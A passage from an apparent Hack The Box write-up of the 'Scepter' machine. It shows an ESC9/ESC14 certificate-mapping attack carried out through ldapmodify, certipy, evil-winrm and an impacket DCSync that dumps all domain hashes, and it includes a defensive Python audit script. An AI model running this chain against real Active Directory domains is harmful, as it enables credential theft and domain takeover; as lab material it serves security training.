AdminCount Bypass Warning  | ❌ No warning               | ⚠️ Warns about adminCount=1 (inhibits inheritance)

Now we need to set the mail attribute of the account we control (d.baker) to the e-mail address of the target account.

Let’s try the administrator first (administrator_mail.ldif):

dn: CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb
changetype: modify
replace: mail
mail: administrator@scepter.htb
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ ldapmodify -x -H ldap://10.10.11.65 -D 'scepter\a.carter' -w 'P@ssw0rd@123' -f administrator_mail.ldif 
modifying entry "CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb"

Now we can request a certificate from the StaffAccessCertificate template as d.baker:

└─$ certipy req -username d.baker@scepter.htb -hashes :18b5fb0d99e7a475316213c15b6f22ce -ca scepter-DC01-CA -template StaffAccessCertificate
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The resolution lifetime expired after 5.401 seconds: Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 2
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'd.baker.pfx'
[*] Wrote certificate and private key to 'd.baker.pfx'

But when I try to get the hash, it says "Name mismatch between certificate and user 'administrator'", which was strange.

└─$ certipy auth -pfx d.baker.pfx -domain scepter.htb -username Administrator -dc-ip '10.10.11.65'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'administrator@scepter.htb'
[*] Trying to get TGT...
[-] Name mismatch between certificate and user 'administrator'
[-] See the wiki for more information

Let’s try with a different user’s email

h.brown
p.adams
e.lewis
o.scott
M.clark

Let’s start with h.brown

└─$ cat h_brown_mail.ldif                                                                                                                   
dn: CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb
changetype: modify
replace: mail
mail: h.brown@scepter.htb

└─$ ldapmodify -x -H ldap://10.10.11.65 -D 'scepter\a.carter' -w 'P@ssw0rd@123' -f h_brown_mail.ldif      
modifying entry "CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb"

                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ certipy req -username d.baker@scepter.htb -hashes :18b5fb0d99e7a475316213c15b6f22ce -ca scepter-DC01-CA -template StaffAccessCertificate
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The resolution lifetime expired after 5.407 seconds: Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'd.baker.pfx'
File 'd.baker.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'd.baker.pfx'

Now we can try to get the hash

└─$ certipy auth -pfx d.baker.pfx -domain scepter.htb -username h.brown -dc-ip '10.10.11.65'    
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'h.brown@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'h.brown.ccache'
[*] Wrote credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c

Now we can get a shell. We generate a krb5.conf with netexec, point Kerberos at it and at h.brown’s ticket cache, and connect with evil-winrm using Kerberos authentication:

└─$ netexec smb 10.10.11.65 -u a.carter -p 'P@ssw0rd@123' --generate-krb5-file ./krb5.conf
SMB         10.10.11.65     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:scepter.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.65     445    DC01             [+] scepter.htb\a.carter:P@ssw0rd@123 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ export KRB5_CONFIG=./krb5.conf
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ export KRB5CCNAME=h.brown.ccache                                                      
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ evil-winrm -i dc01.scepter.htb -k -f h.brown.ccache -r scepter.htb 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: Useless cert/s provided, SSL is not enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\h.brown\Documents> 

user.txt is on h.brown’s Desktop:


    Directory: C:\Users\h.brown\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        6/24/2025   2:22 PM             34 user.txt

Privilege Escalation

ESC9 with modification (ESC14)

Looking at the ldapdomaindump output, we could abuse ESC9 for the account h.brown because it was the only account with the LDAP attribute altSecurityIdentities set to X509:<RFC822>h.brown@scepter.htb.

h.brown is a member of the group CMS.

Let’s check the ACEs granted to the CMS group:

*Evil-WinRM* PS C:\Users\h.brown\Documents> Get-ADObject -Filter * -Properties nTSecurityDescriptor | ForEach-Object { $dn=$_.DistinguishedName; $_.nTSecurityDescriptor.Access | Where-Object { $_.IdentityReference -like "*CMS*" } | ForEach-Object { "$($_.IdentityReference) has $($_.ActiveDirectoryRights) on $($_.ObjectType) - Target: $dn" } }
SCEPTER\CMS has WriteProperty on 00fbf30c-91fe-11d1-aebc-0000f80367c1 - Target: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has ReadProperty on 00000000-0000-0000-0000-000000000000 - Target: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has GenericExecute on 00000000-0000-0000-0000-000000000000 - Target: OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has ReadProperty on 00000000-0000-0000-0000-000000000000 - Target: OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has WriteProperty on 00fbf30c-91fe-11d1-aebc-0000f80367c1 - Target: OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb

The line SCEPTER\CMS has WriteProperty on 00fbf30c-91fe-11d1-aebc-0000f80367c1 - Target: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb tells us that SCEPTER\CMS has write access to the altSecurityIdentities attribute (schema GUID 00fbf30c-91fe-11d1-aebc-0000f80367c1) on p.adams.

So if we can add an altSecurityIdentities mapping for p.adams, we can obtain p.adams's hash the same way, and we know that p.adams has DCSync rights.

*Evil-WinRM* PS C:\Users\h.brown\Documents> Get-ADUser -Identity "p.adams" -Properties altSecurityIdentities | Select-Object Name,altSecurityIdentities

Name    altSecurityIdentities
----    ---------------------
p.adams {}

*Evil-WinRM* PS C:\Users\h.brown\Documents> Set-ADUser -Identity "p.adams" -Add @{altSecurityIdentities='X509:<RFC822>p.adams@scepter.htb'}
*Evil-WinRM* PS C:\Users\h.brown\Documents> Get-ADUser -Identity "p.adams" -Properties altSecurityIdentities | Select-Object Name,altSecurityIdentities

Name    altSecurityIdentities
----    ---------------------
p.adams {X509:<RFC822>p.adams@scepter.htb}

*Evil-WinRM* PS C:\Users\h.brown\Documents> 

Now, as in ESC9, we need to set d.baker's mail attribute to p.adams@scepter.htb so that the certificate issued to d.baker carries that address and matches the mapping we just added:

└─$ ldapmodify -x -H ldap://10.10.11.65 -D 'scepter\a.carter' -w 'P@ssw0rd@123' -f p_adams_mail.ldif
modifying entry "CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb"

                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ cat p_adams_mail.ldif  
dn: CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb
changetype: modify
replace: mail
mail: p.adams@scepter.htb
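As an added defender-side check (not part of the original writeup), this Python script audits the two preconditions that made this path possible: a principal with write access on altSecurityIdentities, parsed from the Get-ADObject output format shown above, and an X509:<RFC822> mapping that collides with another account's mail attribute. The weak/strong mapping categories follow Microsoft's KB5014754 classification; the sample ACE lines and account records are constructed from the state shown above.

```python
import re

ALT_SEC_ID_GUID = "00fbf30c-91fe-11d1-aebc-0000f80367c1"  # altSecurityIdentities schema GUID
ALL_PROPERTIES = "00000000-0000-0000-0000-000000000000"   # ACE applies to every attribute
WRITE_RIGHTS = {"WriteProperty", "GenericWrite", "GenericAll"}
# Mapping formats Microsoft classifies as weak (mutable, non-unique fields) vs strong.
WEAK_PREFIXES = ("X509:<I><S>", "X509:<S>", "X509:<RFC822>")
STRONG_PREFIXES = ("X509:<I><SR>", "X509:<SKI>", "X509:<SHA1-PUKEY>")
# One line of the "<who> has <rights> on <guid> - Target: <dn>" format printed above.
ACE_RE = re.compile(r"^(?P<who>\S+) has (?P<rights>[\w, ]+?) on (?P<guid>[0-9a-fA-F-]{36}) - Target: (?P<dn>.+)$")


def classify_mapping(value):
    """'strong', 'weak' or 'unknown' for one altSecurityIdentities value."""
    if value.startswith(STRONG_PREFIXES):
        return "strong"
    return "weak" if value.startswith(WEAK_PREFIXES) else "unknown"


def altsecid_writers(ace_lines):
    """(principal, target DN) for ACEs granting write on altSecurityIdentities."""
    hits = []
    for line in ace_lines:
        m = ACE_RE.match(line.strip())
        if m and m["guid"].lower() in (ALT_SEC_ID_GUID, ALL_PROPERTIES):
            if {r.strip() for r in m["rights"].split(",")} & WRITE_RIGHTS:
                hits.append((m["who"], m["dn"]))
    return hits


def rfc822_collisions(accounts):
    """(mapped account, other account) where an X509:<RFC822> mapping equals the mail
    of a different account: a certificate issued to that other account with its mail
    in the SAN would authenticate as the mapped account."""
    mail_owner = {a["mail"].lower(): a["sam"] for a in accounts if a.get("mail")}
    hits = []
    for a in accounts:
        for v in a.get("altSecurityIdentities", []):
            if v.startswith("X509:<RFC822>"):
                owner = mail_owner.get(v[len("X509:<RFC822>"):].lower())
                if owner and owner != a["sam"]:
                    hits.append((a["sam"], owner))
    return hits


# Constructed sample: two of the ACE lines shown above and the account state after
# the mapping was added to p.adams and d.baker's mail was replaced.
SAMPLE_ACES = [
    "SCEPTER\\CMS has WriteProperty on 00fbf30c-91fe-11d1-aebc-0000f80367c1 - Target: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb",
    "SCEPTER\\CMS has GenericExecute on 00000000-0000-0000-0000-000000000000 - Target: OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb",
]
SAMPLE_ACCOUNTS = [
    {"sam": "h.brown", "mail": "h.brown@scepter.htb", "altSecurityIdentities": ["X509:<RFC822>h.brown@scepter.htb"]},
    {"sam": "p.adams", "mail": "", "altSecurityIdentities": ["X509:<RFC822>p.adams@scepter.htb"]},
    {"sam": "d.baker", "mail": "p.adams@scepter.htb", "altSecurityIdentities": []},
]
```

Fed a full ldapdomaindump-style export and the complete ACE listing, the two functions flag every account whose identity can be claimed through a colliding mail value and every principal able to plant such a mapping.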

Now let’s request a certificate as d.baker and authenticate with it as p.adams to get the hash:

└─$ certipy req -username d.baker@scepter.htb -hashes :18b5fb0d99e7a475316213c15b6f22ce -ca scepter-DC01-CA -template StaffAccessCertificate                                                              
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: SCEPTER.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 9
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'd.baker.pfx'
[*] Wrote certificate and private key to 'd.baker.pfx'

└─$ certipy auth -pfx d.baker.pfx -domain scepter.htb -username p.adams -dc-ip '10.10.11.65' 
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'p.adams@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'p.adams.ccache'
[*] Wrote credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0

DCSync

└─$ impacket-secretsdump scepter.htb/p.adams@10.10.11.65 -hashes aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Kerberos keys grabbed
[*] Cleaning up... 

With the Administrator NT hash we can pass the hash over WinRM, and we are in:

└─$ evil-winrm -i 10.10.11.65 -u administrator -H a291ead3493f9773dc615e66c2ea21c4
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

root.txt is on the Administrator's Desktop:

   Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        6/24/2025   2:22 PM             34 root.txt
